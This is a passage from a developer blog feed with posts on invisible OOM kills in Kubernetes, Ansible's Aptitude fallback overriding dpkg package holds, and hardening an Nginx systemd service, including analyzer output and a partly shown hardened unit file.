&lt;p&gt;Given the intricacies of this subject, the provided information just offers a high-level overview. For a more in-depth understanding, consider exploring the details presented in &lt;a href="https://github.com/kubernetes/kubernetes/issues/43916" rel="noopener noreferrer"&gt;this GitHub issue&lt;/a&gt;. Notably, &lt;a href="https://github.com/kubernetes/kubernetes/issues/43916#issuecomment-430841267" rel="noopener noreferrer"&gt;this specific comment&lt;/a&gt; contains a concise summary of the matter.&lt;/p&gt;

&lt;h3&gt;
  
  
  Problem 3: Invisible OOM Kills
&lt;/h3&gt;

&lt;p&gt;By default, Kubernetes enforces process separation through namespaces. This ensures that the main process is assigned &lt;code&gt;PID 1&lt;/code&gt;, a crucial identifier in the Linux process hierarchy. It's responsible for the lifecycle of all sub-processes and the only one considered in Kubernetes' monitoring by default. Let's examine this with a quick look at a system using &lt;code&gt;ps&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;root@ubuntu:/# ps &lt;span class="nt"&gt;-aux&lt;/span&gt;
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.0   2796  1408 ?        S&amp;lt;s  18:25   0:00 &lt;span class="nb"&gt;sleep &lt;/span&gt;604800
root          20  0.0  0.0   4636  3840 pts/0    S&amp;lt;s  19:12   0:00 bash
root          41  0.0  0.0   7068  3072 pts/0    R&amp;lt;+  19:13   0:00 ps &lt;span class="nt"&gt;-aux&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In the output, &lt;code&gt;PID 1&lt;/code&gt; corresponds to the main process, showcasing the default isolation within namespaces.&lt;/p&gt;

&lt;p&gt;The OOM Killer selects processes that will free up the maximum amount of memory, factoring in the &lt;code&gt;oom_score&lt;/code&gt; of each process. Therefore the process killed isn't always the main process of a container! Despite the OOM Killer's actions, Kubernetes metrics only reflect the OOM kill when &lt;code&gt;PID 1&lt;/code&gt; is affected. This invisibility could cause a potential mismatch between the container's status and its actual state when not using other sufficient health checks.&lt;/p&gt;

&lt;p&gt;As a result, the lifecycle of the killed process is not managed by Kubernetes. That may not be a significant issue if the main process functions as an init system, but it becomes problematic when the container's main process does not handle terminated child processes correctly: the Pod keeps appearing to run without any apparent issues.&lt;/p&gt;

&lt;p&gt;Understanding these details in process isolation and OOM handling is crucial for a predictable and stable environment.&lt;/p&gt;
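&lt;p&gt;To see which process the OOM Killer would likely pick first, you can read the scores the kernel exposes under &lt;code&gt;/proc&lt;/code&gt;. This is a rough sketch, not a monitoring solution: &lt;code&gt;oom_ranking&lt;/code&gt; is a hypothetical helper name, and it only looks at &lt;code&gt;/proc/PID/oom_score&lt;/code&gt; and &lt;code&gt;/proc/PID/comm&lt;/code&gt; for the processes visible in the current PID namespace.&lt;/p&gt;

```python
from pathlib import Path


def oom_ranking(proc_root="/proc"):
    """Return (oom_score, pid, command) tuples, highest score first."""
    ranking = []
    for entry in Path(proc_root).iterdir():
        if not entry.name.isdigit():
            continue  # skip non-process entries such as "self" or "meminfo"
        try:
            score = int((entry / "oom_score").read_text())
            command = (entry / "comm").read_text().strip()
        except (OSError, ValueError):
            continue  # process vanished while reading, or access was denied
        ranking.append((score, int(entry.name), command))
    return sorted(ranking, reverse=True)
```

&lt;p&gt;If the first entry of &lt;code&gt;oom_ranking()&lt;/code&gt; is not &lt;code&gt;PID 1&lt;/code&gt;, an OOM kill inside that container is likely to hit a child process and stay invisible unless a health check notices the missing worker.&lt;/p&gt;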

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;In summary, effective management of Kubernetes memory constraints requires some understanding of namespaces and related challenges. Discrepancies in cgroup awareness, issues with Linux's page cache metrics in cAdvisor, and the invisibility of certain OOM kills underscore the need for a nuanced approach.&lt;/p&gt;

&lt;p&gt;Mastering these intricacies is important to maintain a reliable Kubernetes infrastructure, optimizing resource utilization for containerized applications and preventing unexpected disruptions.&lt;/p&gt;

</description>
      <category>kubernetes</category>
      <category>linux</category>
      <category>containers</category>
    </item>
    <item>
      <title>Taking Down Production With Ansible and Aptitude</title>
      <dc:creator>David Gries</dc:creator>
      <pubDate>Sun, 26 Nov 2023 19:49:02 +0000</pubDate>
      <link>https://forem.com/dgries/crashing-production-with-ansible-and-aptitude-3ljm</link>
      <guid>https://forem.com/dgries/crashing-production-with-ansible-and-aptitude-3ljm</guid>
      <description>&lt;h2&gt;
  
  
  The Importance of Consistent Base Systems
&lt;/h2&gt;

&lt;p&gt;Few things are as anxiety-inducing as watching stable production servers become a chaotic mess after a simple update. Yet, this scenario is one that many sysadmins dread. If you're seeking ways to avoid such scenarios, especially while leveraging Ansible in combination with Debian-based systems, read on.&lt;/p&gt;

&lt;h3&gt;
  
  
  📦 Linux Package Management: A Double-Edged Sword
&lt;/h3&gt;

&lt;p&gt;One of the greatest advantages of Linux systems is without a doubt their package management. Most "classic" distributions handle application and operating system updates using the same package management system. This has many advantages, like applying the latest security patches for the OS and applications in a single update transaction. But this of course has its drawbacks.&lt;/p&gt;

&lt;p&gt;Just think about application updates: databases like PostgreSQL, for example, are not always compatible across major releases. This is one of the reasons Long Term Support (LTS) distributions often stick to specific application versions and only provide bug fixes and security patches during their lifecycle.&lt;/p&gt;

&lt;h3&gt;
  
  
  🗄️ The Issue With Third Party Repositories
&lt;/h3&gt;

&lt;p&gt;Third-party packages (in the sense of not being provided in the distribution's repository) are often used, be it to avoid unwanted changes by package maintainers, to install software versions provided by the application vendor, or to get software that is simply not available in the default repositories. However, these often follow release cycles distinct from the underlying distro's, complicating system update processes.&lt;/p&gt;

&lt;p&gt;This leads to the necessity to mitigate unwanted upgrades when updating the base OS. Different package managers handle this in various ways.&lt;/p&gt;

&lt;h3&gt;
  
  
  📌 Ansible and Pinning Debian Packages
&lt;/h3&gt;

&lt;p&gt;Debian-based systems offer means to prevent package version upgrades. Apart from employing &lt;a href="https://wiki.debian.org/AptConfiguration#apt_preferences_.28APT_pinning.29" rel="noopener noreferrer"&gt;APT Pinning&lt;/a&gt;, sometimes simply adhering to a specific version suffices, accomplished by "holding" packages using &lt;a href="https://manpages.debian.org/bookworm/apt/apt-mark.8.en.html" rel="noopener noreferrer"&gt;apt-mark&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Now to why inconsistency between systems can make a difference here, using a real-world example (luckily not in production). Ansible's &lt;a href="https://docs.ansible.com/ansible/latest/collections/ansible/builtin/apt_module.html" rel="noopener noreferrer"&gt;ansible.builtin.apt&lt;/a&gt; module by default uses &lt;a href="https://wiki.debian.org/Aptitude" rel="noopener noreferrer"&gt;Aptitude&lt;/a&gt;, an alternative frontend to the &lt;code&gt;apt&lt;/code&gt; or &lt;code&gt;apt-get&lt;/code&gt; CLI. If Aptitude is not available, the module falls back to using said programs. &lt;code&gt;dpkg&lt;/code&gt;, which is also used as the backend for &lt;code&gt;apt-mark&lt;/code&gt;, stores the state of every installed package in the package status database under &lt;code&gt;/var/lib/dpkg/status&lt;/code&gt;. Unfortunately, this data is not taken into account by Aptitude. It uses its own database for its &lt;code&gt;hold&lt;/code&gt; function.&lt;/p&gt;

&lt;p&gt;What's the upshot? Let's say you update all machines using the Apt module for Ansible. The packages you want to handle separately (e.g. the "main" function of the server) are held by DPKG to avoid unwanted upgrades, so you're safe. There's one issue though: one of the systems has Aptitude installed without you knowing. So during the upgrade, Ansible detects Aptitude, adopts it as the default package management tool, and updates all packages, including those retained in DPKG's database. Not an ideal outcome, right?&lt;/p&gt;
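&lt;p&gt;Before a fleet-wide upgrade, it can help to check which holds &lt;code&gt;dpkg&lt;/code&gt; actually knows about on each machine. The sketch below parses the text of the status database and lists every package whose &lt;code&gt;Status&lt;/code&gt; field starts with &lt;code&gt;hold&lt;/code&gt;. &lt;code&gt;held_packages&lt;/code&gt; is a hypothetical helper name, and the parsing is deliberately simplified: it assumes stanzas are separated by blank lines and ignores continuation lines.&lt;/p&gt;

```python
def held_packages(status_text):
    """Return names of packages whose dpkg selection state is 'hold'."""
    held = []
    for stanza in status_text.split("\n\n"):
        fields = {}
        for line in stanza.splitlines():
            # Continuation lines of multi-line fields start with whitespace.
            if line[:1] in (" ", "\t") or ":" not in line:
                continue
            key, _, value = line.partition(":")
            fields[key] = value.strip()
        # Status looks like "hold ok installed"; the first word is the
        # selection state that apt-mark hold sets.
        if fields.get("Status", "").split()[:1] == ["hold"]:
            held.append(fields.get("Package", ""))
    return held
```

&lt;p&gt;Feeding it the contents of &lt;code&gt;/var/lib/dpkg/status&lt;/code&gt; gives the list of dpkg-level holds. It says nothing about Aptitude's own hold state, which is exactly the gap described above, so treat an empty or unexpected result as a reason to look closer, not as proof of safety.&lt;/p&gt;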

&lt;h3&gt;
  
  
  🛡️ How to Safeguard Against This
&lt;/h3&gt;

&lt;p&gt;Several approaches exist to tackle such scenarios, like containerizing applications, creating custom repos, or employing diverse methods to pin packages. However, if retaining existing infrastructure is the priority, ensuring Aptitude's presence on all systems or setting the &lt;code&gt;force_apt_get&lt;/code&gt; option in the Ansible module can avert inconsistencies between systems.&lt;/p&gt;

&lt;p&gt;Moreover, it's important that you know your infrastructure and ensure that servers with similar functions or managed by one team are set up in a consistent manner.&lt;/p&gt;

&lt;p&gt;❓ How do you handle similar scenarios? Feel free to share your thoughts or critique in the comments!&lt;/p&gt;

</description>
      <category>ansible</category>
      <category>debian</category>
      <category>ubuntu</category>
      <category>automation</category>
    </item>
    <item>
      <title>Building Secure Foundations: A Practical Guide to Minimizing Linux Services' Attack Surface</title>
      <dc:creator>David Gries</dc:creator>
      <pubDate>Sat, 11 Nov 2023 22:47:03 +0000</pubDate>
      <link>https://forem.com/dgries/enhancing-service-security-with-systemd-j2i</link>
      <guid>https://forem.com/dgries/enhancing-service-security-with-systemd-j2i</guid>
      <description>&lt;p&gt;Cybersecurity and its awareness have never been more crucial than they are today. Considering the increasing amount of attacks, it has become clear that protecting digital assets plays a significant role in software development and operations. What concrete steps can be taken to enhance the security of our services even further?&lt;/p&gt;

&lt;h3&gt;
  
  
  Starting at a Lower Level
&lt;/h3&gt;

&lt;p&gt;While antivirus software and a well-executed read-only backup strategy are essential for identifying and reducing the impact of threats, it's important to establish a strong foundation of security from the outset. Rather than solely focusing on mitigating consequences after the fact, reducing the attack surface should be a primary goal.&lt;/p&gt;

&lt;p&gt;This can be done by limiting access to the underlying system, like running as an arbitrary user and dropping unneeded privileges. In Kubernetes, this would for example typically mean using non-root base images in combination with &lt;a href="https://kubernetes.io/docs/tasks/configure-pod-container/security-context/" rel="noopener noreferrer"&gt;&lt;code&gt;securityContext&lt;/code&gt;&lt;/a&gt; definitions.&lt;/p&gt;

&lt;p&gt;But in some cases, it's better or even required to deploy directly on virtual machines. So how can a similar strategy be applied there?&lt;/p&gt;

&lt;h2&gt;
  
  
  🔒 Hardening Nginx: Step by Step
&lt;/h2&gt;

&lt;p&gt;Let's examine a real-world example using the Nginx service file provided by Ubuntu 20.04:&lt;/p&gt;

&lt;h3&gt;
  
  
  The Defaults
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;david@proxy:~$ systemctl cat nginx.service&lt;/code&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight ini"&gt;&lt;code&gt;&lt;span class="c"&gt;# /lib/systemd/system/nginx.service
&lt;/span&gt;&lt;span class="nn"&gt;[Unit]&lt;/span&gt;
&lt;span class="py"&gt;Description&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;A high performance web server and a reverse proxy server&lt;/span&gt;
&lt;span class="py"&gt;Documentation&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;man:nginx(8)&lt;/span&gt;
&lt;span class="py"&gt;After&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;network.target&lt;/span&gt;

&lt;span class="nn"&gt;[Service]&lt;/span&gt;
&lt;span class="py"&gt;Type&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;forking&lt;/span&gt;
&lt;span class="py"&gt;PIDFile&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;/run/nginx.pid&lt;/span&gt;
&lt;span class="py"&gt;ExecStartPre&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;/usr/sbin/nginx -t -q -g 'daemon on; master_process on;'&lt;/span&gt;
&lt;span class="py"&gt;ExecStart&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;/usr/sbin/nginx -g 'daemon on; master_process on;'&lt;/span&gt;
&lt;span class="py"&gt;ExecReload&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;/usr/sbin/nginx -g 'daemon on; master_process on;' -s reload&lt;/span&gt;
&lt;span class="py"&gt;ExecStop&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;-/sbin/start-stop-daemon --quiet --stop --retry QUIT/5 --pidfile /run/nginx.pid&lt;/span&gt;
&lt;span class="py"&gt;TimeoutStopSec&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;5&lt;/span&gt;
&lt;span class="py"&gt;KillMode&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;mixed&lt;/span&gt;

&lt;span class="nn"&gt;[Install]&lt;/span&gt;
&lt;span class="py"&gt;WantedBy&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;multi-user.target&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;By default, the service runs as the &lt;code&gt;root&lt;/code&gt; user. Therefore, processes spawned by &lt;code&gt;/usr/sbin/nginx&lt;/code&gt; have all privileges of the &lt;code&gt;root&lt;/code&gt; user and group, which could allow malicious software to control every part of the system when there is an exploit for Nginx. While Nginx is also able to use arbitrary users by itself, the main process that's started by the service still has root privileges. In many cases, this is not required and can be avoided by using Systemd's already built-in capabilities.&lt;/p&gt;

&lt;h3&gt;
  
  
  Breaking it Down
&lt;/h3&gt;

&lt;p&gt;The &lt;code&gt;systemd-analyze&lt;/code&gt; CLI tool can help you get an overview of potential issues with Systemd services:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;systemd-analyze security                # provides a high-level overview including a
                                        # numeric "exposure" value of Systemd services

systemd-analyze security &amp;lt;service_name&amp;gt; # shows detailed security-related information
                                        # about a single service
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The output for the &lt;code&gt;nginx&lt;/code&gt; service looks like this:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;david@proxy:~$ systemd-analyze security nginx.service --no-pager&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;
  Nginx Service Security Summary
  &lt;br&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;  NAME                                                        DESCRIPTION                                                       EXPOSURE
✗ PrivateNetwork=                                             Service has access to the host's network                               0.5
✗ User=/DynamicUser=                                          Service runs as root user                                              0.4
✗ CapabilityBoundingSet=~CAP_SET(UID|GID|PCAP)                Service may change UID/GID identities/capabilities                     0.3
✗ CapabilityBoundingSet=~CAP_SYS_ADMIN                        Service has administrator privileges                                   0.3
✗ CapabilityBoundingSet=~CAP_SYS_PTRACE                       Service has ptrace() debugging abilities                               0.3
✗ RestrictAddressFamilies=~AF_(INET|INET6)                    Service may allocate Internet sockets                                  0.3
✗ RestrictNamespaces=~CLONE_NEWUSER                           Service may create user namespaces                                     0.3
✗ RestrictAddressFamilies=~…                                  Service may allocate exotic sockets                                    0.3
✗ CapabilityBoundingSet=~CAP_(CHOWN|FSETID|SETFCAP)           Service may change file ownership/access mode/capabilities unres…      0.2
✗ CapabilityBoundingSet=~CAP_(DAC_*|FOWNER|IPC_OWNER)         Service may override UNIX file/IPC permission checks                   0.2
✗ CapabilityBoundingSet=~CAP_NET_ADMIN                        Service has network configuration privileges                           0.2
✗ CapabilityBoundingSet=~CAP_RAWIO                            Service has raw I/O access                                             0.2
✗ CapabilityBoundingSet=~CAP_SYS_MODULE                       Service may load kernel modules                                        0.2
✗ CapabilityBoundingSet=~CAP_SYS_TIME                         Service processes may change the system clock                          0.2
✗ DeviceAllow=                                                Service has no device ACL                                              0.2
✗ IPAddressDeny=                                              Service does not define an IP address whitelist                        0.2
✓ KeyringMode=                                                Service doesn't share key material with other services
✗ NoNewPrivileges=                                            Service processes may acquire new privileges                           0.2
✓ NotifyAccess=                                               Service child processes cannot alter service state
✗ PrivateDevices=                                             Service potentially has access to hardware devices                     0.2
✗ PrivateMounts=                                              Service may install system mounts                                      0.2
✗ PrivateTmp=                                                 Service has access to other software's temporary files                 0.2
✗ PrivateUsers=                                               Service has access to other users                                      0.2
✗ ProtectClock=                                               Service may write to the hardware clock or system clock                0.2
✗ ProtectControlGroups=                                       Service may modify the control group file system                       0.2
✗ ProtectHome=                                                Service has full access to home directories                            0.2
✗ ProtectKernelLogs=                                          Service may read from or write to the kernel log ring buffer           0.2
✗ ProtectKernelModules=                                       Service may load or read kernel modules                                0.2
✗ ProtectKernelTunables=                                      Service may alter kernel tunables                                      0.2
✗ ProtectSystem=                                              Service has full access to the OS file hierarchy                       0.2
✗ RestrictAddressFamilies=~AF_PACKET                          Service may allocate packet sockets                                    0.2
✗ RestrictSUIDSGID=                                           Service may create SUID/SGID files                                     0.2
✗ SystemCallArchitectures=                                    Service may execute system calls with all ABIs                         0.2
✗ SystemCallFilter=~@clock                                    Service does not filter system calls                                   0.2
✗ SystemCallFilter=~@debug                                    Service does not filter system calls                                   0.2
✗ SystemCallFilter=~@module                                   Service does not filter system calls                                   0.2
✗ SystemCallFilter=~@mount                                    Service does not filter system calls                                   0.2
✗ SystemCallFilter=~@raw-io                                   Service does not filter system calls                                   0.2
✗ SystemCallFilter=~@reboot                                   Service does not filter system calls                                   0.2
✗ SystemCallFilter=~@swap                                     Service does not filter system calls                                   0.2
✗ SystemCallFilter=~@privileged                               Service does not filter system calls                                   0.2
✗ SystemCallFilter=~@resources                                Service does not filter system calls                                   0.2
✓ AmbientCapabilities=                                        Service process does not receive ambient capabilities
✗ CapabilityBoundingSet=~CAP_AUDIT_*                          Service has audit subsystem access                                     0.1
✗ CapabilityBoundingSet=~CAP_KILL                             Service may send UNIX signals to arbitrary processes                   0.1
✗ CapabilityBoundingSet=~CAP_MKNOD                            Service may create device nodes                                        0.1
✗ CapabilityBoundingSet=~CAP_NET_(BIND_SERVICE|BROADCAST|RAW) Service has elevated networking privileges                             0.1
✗ CapabilityBoundingSet=~CAP_SYSLOG                           Service has access to kernel logging                                   0.1
✗ CapabilityBoundingSet=~CAP_SYS_(NICE|RESOURCE)              Service has privileges to change resource use parameters               0.1
✗ RestrictNamespaces=~CLONE_NEWCGROUP                         Service may create cgroup namespaces                                   0.1
✗ RestrictNamespaces=~CLONE_NEWIPC                            Service may create IPC namespaces                                      0.1
✗ RestrictNamespaces=~CLONE_NEWNET                            Service may create network namespaces                                  0.1
✗ RestrictNamespaces=~CLONE_NEWNS                             Service may create file system namespaces                              0.1
✗ RestrictNamespaces=~CLONE_NEWPID                            Service may create process namespaces                                  0.1
✗ RestrictRealtime=                                           Service may acquire realtime scheduling                                0.1
✗ SystemCallFilter=~@cpu-emulation                            Service does not filter system calls                                   0.1
✗ SystemCallFilter=~@obsolete                                 Service does not filter system calls                                   0.1
✗ RestrictAddressFamilies=~AF_NETLINK                         Service may allocate netlink sockets                                   0.1
✗ RootDirectory=/RootImage=                                   Service runs within the host's root directory                          0.1
    SupplementaryGroups=                                        Service runs as root, option does not matter
✗ CapabilityBoundingSet=~CAP_MAC_*                            Service may adjust SMACK MAC                                           0.1
✗ CapabilityBoundingSet=~CAP_SYS_BOOT                         Service may issue reboot()                                             0.1
✓ Delegate=                                                   Service does not maintain its own delegated control group subtree
✗ LockPersonality=                                            Service may change ABI personality                                     0.1
✗ MemoryDenyWriteExecute=                                     Service may create writable executable memory mappings                 0.1
    RemoveIPC=                                                  Service runs as root, option does not apply
✗ RestrictNamespaces=~CLONE_NEWUTS                            Service may create hostname namespaces                                 0.1
✗ UMask=                                                      Files created by service are world-readable by default                 0.1
✗ CapabilityBoundingSet=~CAP_LINUX_IMMUTABLE                  Service may mark files immutable                                       0.1
✗ CapabilityBoundingSet=~CAP_IPC_LOCK                         Service may lock memory into RAM                                       0.1
✗ CapabilityBoundingSet=~CAP_SYS_CHROOT                       Service may issue chroot()                                             0.1
✗ ProtectHostname=                                            Service may change system host/domainname                              0.1
✗ CapabilityBoundingSet=~CAP_BLOCK_SUSPEND                    Service may establish wake locks                                       0.1
✗ CapabilityBoundingSet=~CAP_LEASE                            Service may create file leases                                         0.1
✗ CapabilityBoundingSet=~CAP_SYS_PACCT                        Service may use acct()                                                 0.1
✗ CapabilityBoundingSet=~CAP_SYS_TTY_CONFIG                   Service may issue vhangup()                                            0.1
✗ CapabilityBoundingSet=~CAP_WAKE_ALARM                       Service may program timers that wake up the system                     0.1
✗ RestrictAddressFamilies=~AF_UNIX                            Service may allocate local sockets                                     0.1

→ Overall exposure level for nginx.service: 9.6 UNSAFE 😨
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;




&lt;/p&gt;

&lt;p&gt;Many of those capabilities are not required to run a web server, so it's best to limit the service's privileges. Because interfacing with the Linux kernel directly is complex and prone to change, Systemd lets you declare common restrictions directly in the service's unit file. Given the multitude of configuration parameters for Systemd services, this example concentrates on the settings that most affect security and uses a standard Kubernetes &lt;code&gt;securityContext&lt;/code&gt; as a reference point.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Principle of Least Privilege
&lt;/h3&gt;

&lt;p&gt;Adopting the principle of least privilege is crucial. Restricting access and privileges to the bare essentials shrinks the attack surface significantly. With Kubernetes resources, you'd usually use a &lt;code&gt;securityContext&lt;/code&gt; definition to limit the capabilities of a Pod:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="nn"&gt;...&lt;/span&gt;
    &lt;span class="na"&gt;securityContext&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;runAsNonRoot&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
      &lt;span class="na"&gt;runAsUser&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;1001&lt;/span&gt;
      &lt;span class="na"&gt;runAsGroup&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;2001&lt;/span&gt;
      &lt;span class="na"&gt;allowPrivilegeEscalation&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;
      &lt;span class="na"&gt;privileged&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;
      &lt;span class="na"&gt;readOnlyRootFilesystem&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
      &lt;span class="na"&gt;capabilities&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;drop&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;all&lt;/span&gt;
&lt;span class="nn"&gt;...&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In the above example, the process runs without root privileges on a read-only filesystem and all capabilities are dropped. A similar setup can be achieved using a Systemd service:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;runAsNonRoot: true&lt;/code&gt; ➜ no direct equivalent; where possible, &lt;code&gt;DynamicUser=true&lt;/code&gt; can be used&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;runAsUser: 1001&lt;/code&gt; ➜ &lt;code&gt;User=&amp;lt;username&amp;gt;&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;runAsGroup: 2001&lt;/code&gt; ➜ &lt;code&gt;Group=&amp;lt;groupname&amp;gt;&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;allowPrivilegeEscalation: false&lt;/code&gt; ➜ &lt;code&gt;NoNewPrivileges=true&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;privileged: false&lt;/code&gt; ➜ no direct equivalent; &lt;code&gt;PrivateDevices=&amp;lt;...&amp;gt;&lt;/code&gt;, &lt;code&gt;Protect&amp;lt;...&amp;gt;=&amp;lt;...&amp;gt;&lt;/code&gt; and similar settings can be used&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;readOnlyRootFilesystem: true&lt;/code&gt; ➜ &lt;code&gt;ProtectSystem=strict&lt;/code&gt; or &lt;code&gt;TemporaryFileSystem=/:ro&lt;/code&gt; (the latter also hides all files and needs Systemd &amp;gt;= 238)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;capabilities.drop: ["all"]&lt;/code&gt; ➜ &lt;code&gt;CapabilityBoundingSet=&amp;lt;...&amp;gt;&lt;/code&gt; (an empty assignment drops every capability)
&lt;/li&gt;
&lt;/ul&gt;
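
&lt;p&gt;As a rough sketch, the mapping above could be collected in a drop-in file. The drop-in path and file name are assumptions for illustration, the placeholders have to be replaced with real values, and the selection of &lt;code&gt;Protect&amp;lt;...&amp;gt;&lt;/code&gt; settings is only an approximation of &lt;code&gt;privileged: false&lt;/code&gt;:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight ini"&gt;&lt;code&gt;# Hypothetical drop-in: /etc/systemd/system/&amp;lt;service_name&amp;gt;.service.d/hardening.conf
[Service]
# runAsUser / runAsGroup: the user and group must already exist
User=&amp;lt;username&amp;gt;
Group=&amp;lt;groupname&amp;gt;
# allowPrivilegeEscalation: false
NoNewPrivileges=true
# privileged: false (approximation only, there is no single switch)
PrivateDevices=true
ProtectKernelModules=true
ProtectKernelTunables=true
ProtectControlGroups=true
# readOnlyRootFilesystem: true
ProtectSystem=strict
# capabilities.drop: ["all"], an empty assignment resets the bounding set to empty
CapabilityBoundingSet=
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;A service that has to bind ports below 1024 as a non-root user would additionally need &lt;code&gt;CAP_NET_BIND_SERVICE&lt;/code&gt; in both &lt;code&gt;CapabilityBoundingSet=&lt;/code&gt; and &lt;code&gt;AmbientCapabilities=&lt;/code&gt;. Changes take effect after &lt;code&gt;systemctl daemon-reload&lt;/code&gt; and a restart of the service.&lt;/p&gt;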

&lt;p&gt;Systemd offers many more ways to control the capabilities and permissions of services; they are documented in the &lt;a href="https://www.freedesktop.org/software/systemd/man/systemd.exec.html" rel="noopener noreferrer"&gt;systemd.exec manual&lt;/a&gt;. After applying some of these parameters to the Nginx service, the unit file looks as follows:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;david@proxy:~$ systemctl cat nginx&lt;/code&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight ini"&gt;&lt;code&gt;&lt;span class="c"&gt;# /etc/systemd/system/nginx.service
# Rootless Nginx service based on https://github.com/stephan13360/systemd-services/blob/master/nginx/nginx.service
&lt;/span&gt;&lt;span class="nn"&gt;[Unit]&lt;/span&gt;
&lt;span class="c"&gt;# This is from the default nginx.service
&lt;/span&gt;&lt;span class="py"&gt;Description&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;nginx (hardened rootless)&lt;/span&gt;
&lt;span class="py"&gt;Documentation&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;https://nginx.org/en/docs/&lt;/span&gt;
&lt;span class="py"&gt;Documentation&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;https://github.com/stephan13360/systemd-services/blob/master/nginx/README.md&lt;/span&gt;
&lt;span class="py"&gt;After&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;network-online.target remote-fs.target nss-lookup.target&lt;/span&gt;
&lt;span class="py"&gt;Wants&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;network-online.target&lt;/span&gt;

&lt;span class="nn"&gt;[Service]&lt;/span&gt;
&lt;span class="c"&gt;# forking is not necessary as `daemon` is turned off in the nginx config
&lt;/span&gt;&lt;span class="py"&gt;Type&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;exec&lt;/span&gt;
&lt;span class="py"&gt;User&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;nginx&lt;/span&gt;
&lt;span class="py"&gt;Group&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;nginx&lt;/span&gt;
&lt;span class="c"&gt;## can be used e.g. for accessing directory containing SSL certs
#SupplementaryGroups=acme
# define runtime directory /run/nginx as rootless services can't write to /run
&lt;/span&gt;&lt;span class="py"&gt;RuntimeDirectory&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;nginx&lt;/span&gt;
